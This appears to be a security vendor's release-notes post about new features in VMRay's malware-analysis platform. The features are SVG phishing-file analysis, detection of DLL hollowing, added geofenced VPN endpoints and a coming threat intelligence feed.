Introduction
The first release of 2025 is already behind us, but we’re just getting started. We hope you’ve enjoyed the features delivered in recent months, including searchable threat names, clipboard access detection, enhanced LNK analysis, and residential traffic support via Geofence VPN in Cloud instances.
Now, we’re happy to share the next round of updates to the VMRay Platform and give you a glimpse into what’s to come. Let’s dive into the details!
Picture This – SVG File Analysis is on!
Recently, our Labs team has observed a growing trend in phishing attacks that exploit SVG files, often delivered as email attachments. In a typical phishing campaign using SVGs, the attached file either tricks users into clicking a malicious link or displays a fake login form to steal credentials.
Historically, SVG files haven’t been widely used in cyberattacks, which means many security solutions lacked robust support for scanning them, allowing these threats to slip through undetected. Moreover, SVG attachments in emails are uncommon, making them both suspicious and surprisingly effective for attackers.
Why are SVGs attractive to threat actors? Unlike traditional image formats (PNG, JPG), SVGs are XML , meaning they can contain embedded scripts and links, making them ideal for obfuscation and phishing tactics.
Phishing via embedded links: attackers can hide malicious URLs inside the file.
JavaScript-based payloads: malicious scripts can execute when the SVG is opened in a browser.
Lower detection rates: SVGs are less likely to be flagged by security tools compared to PDFs and DOCX files.
On top of that: no execution warnings – unlike macros in DOCX or EXE files, opening an SVG typically doesn’t alert the user.
That being said, we’re happy to announce that the VMRay Platform now supports SVG file analysis—enabling static, web, and reputation analysis. Try it out today and uncover the true nature of your SVG files.
SVG vs PNG/JPG security concerns
SVG file web analysis in the VMRay Platform
Enhanced Visibility into Advanced Injection Techniques: Spotting DLL Hollowing and beyond
This release also brings a major upgrade to our Dynamic Analysis engine, focused on detecting one of malware’s sneakiest tricks: DLL Hollowing and similar advanced code injection techniques.
What prompted the change?
Some advanced malware samples were bypassing our detection—and both we and our customers flagged the gaps. These threats leveraged techniques like stealthy process creation, thread manipulation, and remote code injection to evade visibility. Our existing monitoring logic didn’t fully capture the lower-level behaviors enabling these tactics.
What’s new?
We expanded our behavioral visibility to cover these stealthy tactics. Specifically, we now dynamically monitor system libraries when suspicious changes are detected, such as:
A system library being newly loaded into memory
Permissions of a module being altered (e.g., from read-only to executable)
Shellcode or modified content being written into the module
Execution jumping into those modified regions
This enhancement allows us to catch malware mid-act, even if it’s hiding in plain sight inside legitimate system components. This update improves our ability to detect evasive threats like HijackLoader, which rely on sophisticated injection methods to avoid detection.
From Sydney to Stavanger: New VPN Endpoints on EU Cloud
Advanced malware often stays inactive until it detects it’s running in a specific region—using clues like IP geolocation, system language, or time zone. To help our customers stay one step ahead of these location-aware threats, we expanded our Geofence on the EU Cloud Platform.
2025.2 release features three new Geofence VPN endpoints:
🇳🇴 Norway
🇵🇹 Portugal
🇦🇺 Australia
With these additions, customers can now simulate traffic from even more geographic regions while staying within the secure boundaries of the EU Cloud. This means:
Better evasion resistance
Broader malware detonation scenarios
More accurate threat intelligence from geo-targeted campaigns
These endpoints are now live and ready to use, giving you greater flexibility to detect, analyze, and respond to threats that rely on regional triggers.
New VPN endpoints on VMRay EU Cloud instances
Prioritized Live Interaction Analysis
Final Thoughts
As mentioned in the Live Interaction update, enhancing this feature remains our top priority; we’re committed to delivering a faster, more seamless experience so you can get the most out of every interactive analysis.
But that’s not all. We’re excited to give you a preview of what’s coming next: a new Threat Intelligence Feed by VMRay designed to deliver high-confidence, noise-free threat data. This marks a major step forward in our journey into the Cyber Threat Intelligence space. Delivered via TAXII 2.1 and supporting formats like STIX 2.1, JSON, CSV, and MISP Extended Format, our Threat Feed is built for easy integration into your existing security tools and workflows. Stay tuned—our marketing team will be sharing more details soon.
Wishing you a secure and productive May, and as always, thank you for being part of the VMRay community.
